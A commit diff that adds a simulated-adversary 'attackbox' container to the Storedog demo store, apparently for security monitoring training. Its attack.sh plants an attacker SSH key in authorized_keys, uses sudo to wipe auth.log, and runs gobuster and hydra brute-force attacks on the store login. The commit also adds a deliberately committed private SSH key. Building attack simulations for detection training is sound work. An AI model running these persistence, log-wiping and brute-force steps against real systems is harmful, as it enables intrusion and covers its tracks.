Port attackbox from ecommerce-workshop (#25)

* add attackbox, update discounts to be attacked

* add attackbox env vars to template

* update instructions

Author: stanleegoodspeed

.env.template

@@ -3,4 +3,12 @@ DISCOUNTS_PORT=2814
 AUTH_PORT=7578
 POSTGRES_USER=postgres
 POSTGRES_PASSWORD=postgres
-DD_API_KEY=
+DD_API_KEY=
+ATTACK_SSH=0
+ATTACK_GOBUSTER=0
+ATTACK_HYDRA=0
+ATTACK_HOST=nginx
+ATTACK_PORT=80
+ATTACK_SSH_INTERVAL=0
+ATTACK_GOBUSTER_INTERVAL=0
+ATTACK_HYDRA_INTERVAL=0

.github/workflows/attackbox.yml

@@ -0,0 +1,50 @@
+name: Attackbox
+
+on:
+  push:
+    branches: [ main ]
+    paths:
+      - services/attackbox/**
+  workflow_dispatch:
+    branches: [ main ]
+
+defaults:
+  run:
+    working-directory: attackbox
+
+jobs:
+
+  build:
+
+    runs-on: ubuntu-latest
+
+    steps:
+    - name: Checkout
+      uses: actions/checkout@v2
+
+    - name: Set up Docker Buildx
+      uses: docker/setup-buildx-action@v1
+
+    - name: Configure AWS credentials
+      uses: aws-actions/configure-aws-credentials@v1
+      with:
+        aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
+        aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
+        aws-region: us-east-1
+
+    - name: Login to ECR
+      id: login-ecr
+      uses: docker/login-action@v1
+      with:
+        registry: public.ecr.aws
+        username: ${{ secrets.AWS_ACCESS_KEY_ID }}
+        password: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
+
+    - name: Build and push
+      uses: docker/build-push-action@v2
+      with:
+        context: ./services/attackbox
+        platforms: linux/amd64
+        push: true
+        tags: ${{ secrets.PUBLIC_ECR_REGISTRY }}/storedog/attackbox:latest
+

.github/workflows/release.yml

@@ -39,6 +39,7 @@ jobs:
             ${{ secrets.PUBLIC_ECR_REGISTRY }}/storedog/backend
             ${{ secrets.PUBLIC_ECR_REGISTRY }}/storedog/discounts
             ${{ secrets.PUBLIC_ECR_REGISTRY }}/storedog/ads
+            ${{ secrets.PUBLIC_ECR_REGISTRY }}/storedog/attackbox
             ${{ secrets.PUBLIC_ECR_REGISTRY }}/storedog/auth
           )
 

docker-compose.yml

@@ -103,12 +103,11 @@ services:
       - DD_APPSEC_ENABLED=true
     build:
       context: ./services/discounts
-    command: flask run --port=${DISCOUNTS_PORT} --host=0.0.0.0 # If using any other port besides the default 8282, overriding the CMD is required
     volumes:
       - "./services/discounts:/app"
     ports:
       - "${DISCOUNTS_PORT}:${DISCOUNTS_PORT}"
-      - "22"
+      - "22:22"
     networks:
       - storedog-net
   auth:
@@ -154,6 +153,25 @@ services:
       - /sys/fs/cgroup/:/host/sys/fs/cgroup:ro
     networks:
       - storedog-net
+  attackbox:
+    build:
+      context: ./services/attackbox
+    profiles:
+      - attackbox
+    environment:
+      - ATTACK_GOBUSTER
+      - ATTACK_HYDRA
+      - ATTACK_GOBUSTER_INTERVAL
+      - ATTACK_HYDRA_INTERVAL
+      - ATTACK_SSH
+      - ATTACK_SSH_INTERVAL
+      - ATTACK_HOST
+      - ATTACK_PORT
+    networks:
+      - storedog-net
+    depends_on:
+      - web
+      - discounts
 
 volumes:
   redis:

services/attackbox/.dockerignore

@@ -0,0 +1,2 @@
+Dockerfile*
+.dockerignore

services/attackbox/Dockerfile

@@ -0,0 +1,43 @@
+FROM kalilinux/kali-rolling:latest
+RUN mkdir /app
+
+ADD https://github.com/OJ/gobuster/releases/download/v3.1.0/gobuster-linux-amd64.7z /app
+ADD https://github.com/vanhauser-thc/thc-hydra/archive/refs/tags/v9.3.zip /app
+
+# Install packages
+RUN export DEBIAN_FRONTEND=noninteractive && \
+    apt-get update && \
+    apt-get upgrade --yes && \
+    apt-get install --yes libssl-dev libssh-dev libidn11-dev libpcre3-dev \
+                 libgtk2.0-dev libmariadb-dev libpq-dev libsvn-dev \
+                 firebird-dev libmemcached-dev libgpg-error-dev \
+                 libgcrypt20-dev  openssh-client iputils-ping wordlists \
+                 build-essential libpq-dev p7zip unzip jq && \
+    apt-get clean && \
+    rm -rf /var/lib/apt/lists/*
+
+# Create user and ssh dir
+RUN useradd -m user
+RUN mkdir -p /home/user/.ssh
+COPY keys/storedog-leaked-key /home/user/.ssh/id_rsa
+
+# Install gobuster and hydra
+WORKDIR /app
+RUN gzip -d /usr/share/wordlists/rockyou.txt.gz
+RUN 7zr e ./gobuster-linux-amd64.7z && chmod +x gobuster
+RUN unzip v9.3.zip && cd thc-hydra-9.3/ && ./configure && make && make install
+
+# Copy attack script and keys
+COPY . .
+
+# Update permissions so ssh keys can be accessed outside sudo user
+RUN chown -R user:user /home/user/.ssh
+RUN chmod +x attack.sh
+RUN chown -R user ./keys
+
+# Switch back to new user so we can SSH properly
+USER user
+RUN chmod 400 /home/user/.ssh/id_rsa
+RUN chmod 400 ./keys/attacker-key
+
+CMD [ "./attack.sh"]

services/attackbox/README.md

@@ -0,0 +1,32 @@
+# Attack Box
+
+This is a container that simulates an adversary attempting to hack the online store.
+
+The script has 3 stages:
+1) Malicious SSH configuration
+2) Gobuster
+3) Hydra
+
+## Deployment
+
+The attack box is configurable via environment variables found in the `.env` file.
+- **ATTACK_SSH**: Set to `1` to run the SSH attack script against the discounts container
+- **ATTACK_GOBUSTER**: Set to `1` to run the Gobuster tool for crawling directories on the container specified in `ATTACK_HOST`
+- **ATTACK_HYDRA**: Set to `1` to run the Hydra tool for brute force login
+- **ATTACK_SSH_INTERVAL**: Number of seconds between SSH attack invocations (if ommited, SSH attack will run once)
+- **ATTACK_GOBUSTER_INTERVAL**: Number of seconds between GOBUSTER invocations (if ommited, GOBUSTER will run once)
+- **ATTACK_HYDRA_INTERVAL**: Number of seconds between HYDRA invocations (if ommited, HYDRA will run once)
+- **ATTACK_PORT**: The web port you want to run the attacks against for hydra and dirbuster.
+- **ATTACK_HOST**: The web host that hydra and dirbuster will attack. ( Probably frontend or nginx )
+
+For example, if you wanted to run Gobuster every 60 seconds and Hydra ever 90 seconds, your `.env` file would look like this:
+```
+ATTACK_GOBUSTER=1
+ATTACK_GOBUSTER_INTERVAL=60
+ATTACK_HYDRA=1
+ATTACK_HYDRA_INTERVAL=90
+```
+## How to start the  attackbox service
+1. `cp .env.template .env`
+2. Set the attack config variables as explained above
+3. Run `docker compose --profile attackbox up `

services/attackbox/attack.sh

@@ -0,0 +1,70 @@
+#!/bin/bash
+
+function ssh_attack()
+{
+# attempt to copy attacker key to discounts
+scp -o StrictHostKeyChecking=no ./keys/attacker-key.pub test@discounts:/home/test/.ssh
+
+# attempt to update authorized_keys to have attacker key
+ssh -o StrictHostKeyChecking=no test@discounts /bin/bash <<EOT
+cat /home/test/.ssh/attacker-key.pub >> /home/test/.ssh/authorized_keys
+exit
+EOT
+
+# attempt to clear log file and zero out unallocated disk space
+ssh -o StrictHostKeyChecking=no -i ./keys/attacker-key test@discounts /bin/bash <<EOT
+echo "test" | sudo -S cp /dev/null /var/log/auth.log
+echo "test" | sudo -S dd if=/dev/zero of=tempfile bs=1000000 count=10
+exit
+EOT
+}
+
+if [ "${ATTACK_SSH}" = 1 ];
+then
+  if [[ -z "${ATTACK_SSH_INTERVAL}" ]]
+    then
+      # run single invocation
+      ssh_attack
+    else
+      # run in a loop
+      while true
+      do
+          ssh_attack
+          sleep $ATTACK_SSH_INTERVAL
+      done &
+  fi
+fi
+
+# Add extra sleep to give frontend time to spin up (docker compose dependency is not enough)
+sleep 15
+
+if [ "${ATTACK_GOBUSTER}" = 1 ];
+then
+  if [[ -z "${ATTACK_GOBUSTER_INTERVAL}" ]]
+    then
+      ./gobuster dir -u http://${ATTACK_HOST}:${ATTACK_PORT} -w /usr/share/wordlists/rockyou.txt
+    else
+      while true
+      do
+          ./gobuster dir -u http://${ATTACK_HOST}:${ATTACK_PORT} -w /usr/share/wordlists/rockyou.txt
+          sleep $ATTACK_GOBUSTER_INTERVAL
+      done &
+  fi
+fi
+
+if [ "${ATTACK_HYDRA}" = 1 ];
+then
+  if [[ -z "${ATTACK_HYDRA_INTERVAL}" ]]
+    then
+      hydra -l [email protected] -P /usr/share/wordlists/rockyou.txt -s ${ATTACK_PORT} ${ATTACK_HOST} http-post-form "/login:utf8=%E2%9C%93&authenticity_token=BonCnTVpWzCfGtgqZ7TiwEcSH89jz30%2F01vkNuVsKyKcC8xCF2DqeHF%2Bc%2B4U2CNWeArygGNPX%2BDvONHHz7Dr6Q%3D%3D&spree_user%5Bemail%5D=admin%40storedog.com&spree_user%5Bpassword%5D=^PASS^&spree_user%5Bremember_me%5D=0&commit=Login:Invalid email or password."
+    else
+      while true
+      do
+          hydra -l [email protected] -P /usr/share/wordlists/rockyou.txt -s ${ATTACK_PORT} ${ATTACK_HOST} http-post-form "/login:utf8=%E2%9C%93&authenticity_token=BonCnTVpWzCfGtgqZ7TiwEcSH89jz30%2F01vkNuVsKyKcC8xCF2DqeHF%2Bc%2B4U2CNWeArygGNPX%2BDvONHHz7Dr6Q%3D%3D&spree_user%5Bemail%5D=admin%40storedog.com&spree_user%5Bpassword%5D=^PASS^&spree_user%5Bremember_me%5D=0&commit=Login:Invalid email or password."
+          sleep $ATTACK_HYDRA_INTERVAL
+      done
+  fi
+fi
+
+# keep container alive
+sleep infinity

services/attackbox/keys/README.md

@@ -0,0 +1,3 @@
+### Attention
+
+These keys are used for training purposes and were **intentionally** added to this repository. These keys are self-contained within the docker images. They do not reside in any other external server. Please do not flag for security purposes and/or a bug bounty program.

services/attackbox/keys/attacker-key

@@ -0,0 +1,38 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+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
+-----END OPENSSH PRIVATE KEY-----